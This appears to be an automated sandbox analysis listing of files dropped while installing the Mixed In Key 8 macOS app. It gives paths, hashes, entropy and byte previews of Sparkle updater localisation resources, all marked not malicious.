                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. ... .s.t.a.t.o. .s.c.a.r.i.c.a.t.o. .e.d. ... .p.r.o.n.t.o. .p.e.r. .e.s.s.e.r.e. .u.t.i.l.i.z.z.a.t.o.!. .D.e.s.i.d.e.r.i. .i.n.s.t.a.l.l.a.r.e. .e. .r.i.a.v.v.i.a.r.e. . .%.1.$.@. .o.r.a.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".I.m.p.o.s.s.i.b.i.l.e. .a.g.g.i.o.r.n.a.r.e. .%.1.$.@. .q.u.a.n.d.o. .v.i.e.n.e. .e.s.e.g.u.i.t.o. .d.a. .u.n. .v.o.l.u.m.e. .d.i. .s.o.l.a. .l.e.t.t.u.r.a. .c.o.m.e. .u.n.. i.m.m.a.g.i.n.e. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_uISpwp
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15585
                                                                                                    Entropy (8bit):6.808768927572087
                                                                                                    Encrypted:false
                                                                                                    MD5:187E84674C031504171C3B0EB54D896E
                                                                                                    SHA1:4F57A7B2521A11233A9E138E94DCC3CB331547A7
                                                                                                    SHA-256:4193E025F7847F3D4ED7B3710FA444905FF464AC65A8705CA9409074E92F3B2B
                                                                                                    SHA-512:47F22EEA28BB4BBCA6D17970DB6B91942A8BD4E98288000C62282FEE116B72504323FD1560930AAC531FC91969DD9E674393EA71546AFD2C20B9ED770E9433A9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_zDEa78
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12102
                                                                                                    Entropy (8bit):6.738918302956528
                                                                                                    Encrypted:false
                                                                                                    MD5:316221D69848EDC917325741E12631D3
                                                                                                    SHA1:816441256DA6B5985699CDA8EAAAA346C1A28D79
                                                                                                    SHA-256:E05CBC301623ADA97991B160BFAFE20DE089CCE3E6FB9C26250F23A7902D1FE3
                                                                                                    SHA-512:4669FCA581BAB979FDE34EE4CA0A669FD3309281DDB43B2C50CF00D43B881A612167044BBE54EC3CB382007113549475927B99FFBDA730F60D278BBC62B3F823
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_ISNgxv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18243
                                                                                                    Entropy (8bit):6.862078689157274
                                                                                                    Encrypted:false
                                                                                                    MD5:C2F1F1819816C3DBBFB415E887D02250
                                                                                                    SHA1:E79929F7B096413171CB3D420732C511067FA0A3
                                                                                                    SHA-256:2AED81F2C1A7519B86450653A5DC48D01209B0DC1942A54F2D388EAC8A17DF1E
                                                                                                    SHA-512:12FF404CD978684DA82B255407DC0F65D37123E91131DF74ACC469AFC99B0053066646DF2115F6F80C8962148CD03BF0327DE335AFCC9CC0D027480150D9752A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v................................................................................... .!.".+.1.2.3.6.9.<.=.?.@.A.B.C.F.G.L.M.Q.V.W.\.].i.j.k.l.s.t.u.x.|.................................................x.`................................... .!.%.G.z._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_W8Tre5
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12177
                                                                                                    Entropy (8bit):6.772335684195305
                                                                                                    Encrypted:false
                                                                                                    MD5:5EEA1DB88F45526700D48D3104E78E78
                                                                                                    SHA1:F3A828F9C017E3AA3AC5DC8749FAF16B6FCC214D
                                                                                                    SHA-256:B63FB649F96E1C2C68093B11B6D9FF9AABEDA39D921DE2AFA26FC99447E8A448
                                                                                                    SHA-512:F54469C0764DF11E997109B038E29E36A77122E786FF745562D424CABC52C5598E4A54B8EE9FC515D4B81D76DFDAA340DEC724FD2FC8A700DAD4EC38F914439A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................".#.$.+.,.-.4.5.6.K.N.O.Q.f...f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...h.k.m.o.v.y.|....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....f.g....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRe
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_gcJisC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15858
                                                                                                    Entropy (8bit):6.83963474801781
                                                                                                    Encrypted:false
                                                                                                    MD5:8D2FCB4967B74BA0DF15EA64115765F5
                                                                                                    SHA1:0E61B3E6949B89C6D9472B192FFB1B76FF4D1346
                                                                                                    SHA-256:EB9013B5A6AE6E078B93515DFE05C20E2C0DB7A7ACD5929AB68A837D4C5C7FB2
                                                                                                    SHA-512:EF104461ACB0F79570B31FE54F91EA1EEBEA8CB1F78514F8A2BF59BCBD610863275BB5A1C484D8E6B57711DD102AB879151182FBE9FBE090D44666D203363B18
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............%.&X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.3.4.5.6.;.P.W.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z...{.|...........b.............................................................(.../.0.3.6.9.B.C.K.O.P.Y.Z.a.b.e.f.{........................................................................................................... .!.).*.+.1.9.:.;.A.I.J.K.Q.X.Y.Z.a.b.c.}...........v.a....................................................................................."U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UN
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_sCQbk2
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text
                                                                                                    Size (bytes):5570
                                                                                                    Entropy (8bit):4.418597814595092
                                                                                                    Encrypted:false
                                                                                                    MD5:A34BB9F567216105341442BBF3A1712D
                                                                                                    SHA1:89133480C61F780339F07C5C7461E5189A921587
                                                                                                    SHA-256:E2BD8D0DD9E25D4CAFD0C06E6DB7914B7DE862D761B168267FFFE3418ED1CC18
                                                                                                    SHA-512:9FE9C1BEAD98D4385585F090C56C59579C85D81C67C6ACEA499FEFCE8EF9B9275A19409DE6C821B75772BCA7341B14A23D31883AEC1239206C0E001B1EAD8AF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .L0.0.0.0.0.0.0U0.0~0W0_0.0!k.Vn0 .%.1.$.@. .w..RBfK0.0.O(u.S..k0j0.0~0Y0.0.NY0P0.Qw..RW0~0Y0K0?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .o0.0.0.0.0.0.0.0.0.0.0IQf[._.0.0.0.0j0i0n0.0.0.0.0.0.0.0.0.0.0.0.0K0.0w..RW0f0D0.04X.T.0.0.0.0.0.0.0g0M0~0[0.0.0%.1.$.@. ..0.0.0.0.0.0.0.0.0.0.0.0.0k0.y.RW0.0]0S0K0.0.Qw..RW0_0._.0.0.0.vW0f0.NU0D0.0".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_HH4DNv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18166
                                                                                                    Entropy (8bit):6.854147270747212
                                                                                                    Encrypted:false
                                                                                                    MD5:D36A98D894AD32C660988EE1F013F992
                                                                                                    SHA1:8B6E79BF68D023F47780BF5B05634213423EBE11
                                                                                                    SHA-256:85A72DC1623C1C94167B59D253E6B767687BE5C7003261AC4A0AFC4AA1D650D6
                                                                                                    SHA-512:679B275CF2BECD39E1783F8B6895EC3D9A2EA47D961AD8D96CDDBA1463879C1312581E710F954578DAF5E4F417CFA0F283BB79D362D40EF0C0BF93089B64974A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_SoSl6E
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text
                                                                                                    Size (bytes):5136
                                                                                                    Entropy (8bit):4.381559641332697
                                                                                                    Encrypted:false
                                                                                                    MD5:E30C0A432130DCB71F1AA1A9A6811F07
                                                                                                    SHA1:EF6BE0E391A4419220495130EA04DD9B87B097C7
                                                                                                    SHA-256:4636D4E141E1840C1469E13983D4834EF8D7301B2583F5979F66ACFA3E540BC0
                                                                                                    SHA-512:8ADE77C7EE85A7CC9C99C9A7461E01341B0008E59B0D26A91B9248C3E79B23674FE8D4AFC170649F9ED37E81A5898F6D3BB82E30E770D6C79A8FF60B88E8BE08
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@.t.(...). .....\... ............. ...\.....D. ...p.t...X... ....... .X.........L.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@.t.(...). .....l. .t....... .C.D. ...|.t... ...@. .}.0. ..... ...h..... ......... ...<...\. ...p.t... .`. ... ........... .%.1.$.@.D.(.|.). .Q.....\..... ...T.\. .t...X... ..... .....t. .......$...".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_jaDfyd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15365
                                                                                                    Entropy (8bit):6.829733028482747
                                                                                                    Encrypted:false
                                                                                                    MD5:5B3DC456CBA2020C01C6B5C4B7B63A07
                                                                                                    SHA1:9712F2CA97803700EA2E00A7723CE3B6A3A281DF
                                                                                                    SHA-256:4E85849D257AE5EDBE81A67BFCEB2AE11EC334C57CF50D6656F1FB5D4C9151A0
                                                                                                    SHA-512:475DFCF97E7F9BE8B212F5EC6FFCAC01EB9F93EF292AF7FD69EBF30665B176D3E9BEB46E3B1A2A30E42D10633E22EACB350575D244129AB0B549850F8777750D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_pu3GrG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12072
                                                                                                    Entropy (8bit):6.760470385888766
                                                                                                    Encrypted:false
                                                                                                    MD5:E8DFC8C149663CE6442C4BB3CC36C2F3
                                                                                                    SHA1:BDD1AA57710CA792EF132C73C5F964CA0572811A
                                                                                                    SHA-256:A70F9E930C3248C8550A4FA5CD5D4199EBE7AF61575AD6A1F7BE86D37FE2A2BB
                                                                                                    SHA-512:610D68BBC66910B975E6F16EE36278CB15971484201003744EB3925685F7AE019AB1E8A2F063A670F2425B1FF1129BF4FF4F5890F5AA7C53CEF47BCF04D7B0DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_DolCIA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12107
                                                                                                    Entropy (8bit):6.737181430242566
                                                                                                    Encrypted:false
                                                                                                    MD5:D1C0F744A4AD30F88AEFF7B76E3A9512
                                                                                                    SHA1:AC6A057946F854A6F41809388F23631E11F17238
                                                                                                    SHA-256:B69A38BCBA4FFF20EFF2F4ED41E0B5A2E0C8A094E87BCA6686E1764434B67017
                                                                                                    SHA-512:33659A221066CDD79287585796FC47AEA1F2F9CE473ACFAB13B15BE0853AC356646B7BE971E9473313B2E950DA0EE12B5462E20062B3EF71C90717CDADD95135
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_TvH2aZ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18264
                                                                                                    Entropy (8bit):6.840208788694169
                                                                                                    Encrypted:false
                                                                                                    MD5:578A0691CAEC48A3290FCF745975AC59
                                                                                                    SHA1:645FC40DC2C99E79036B5A85DCB7388677E24496
                                                                                                    SHA-256:84EC7CE470AB2CB5DE9CCF76DA68DF51391DD82A1ACF56C44F93C75788125EDE
                                                                                                    SHA-512:B49454489A38120B17CB7C33EDD54DB9D5071582DA437EB18F9EC655092C8D570BBF83670F33867F8CB1C7BD2B20E2345726BE1CA10A64E190AEFB2B364F69CF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_WpHq3p
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7816
                                                                                                    Entropy (8bit):3.3876168284286483
                                                                                                    Encrypted:false
                                                                                                    MD5:FB309D6AB1F647C7945D7069658C3B6B
                                                                                                    SHA1:F05906C297ACA56F31FC5C9192D7EAD60174DD19
                                                                                                    SHA-256:3B6362D508BD66CE2C53CA655351F39D2C9C8FF8653281A7B31BBC6B52D00CC5
                                                                                                    SHA-512:2658CF2FF773AA48A7714867C347AE69960DC8CBD7AB9C39992E1EB919047FA7603A25BB41713010CBD25BFA59C5B2F75E12589ACA76BB8988B01180636B3570
                                                                                                    Malicious:false
                                                                                                    Reputation:low
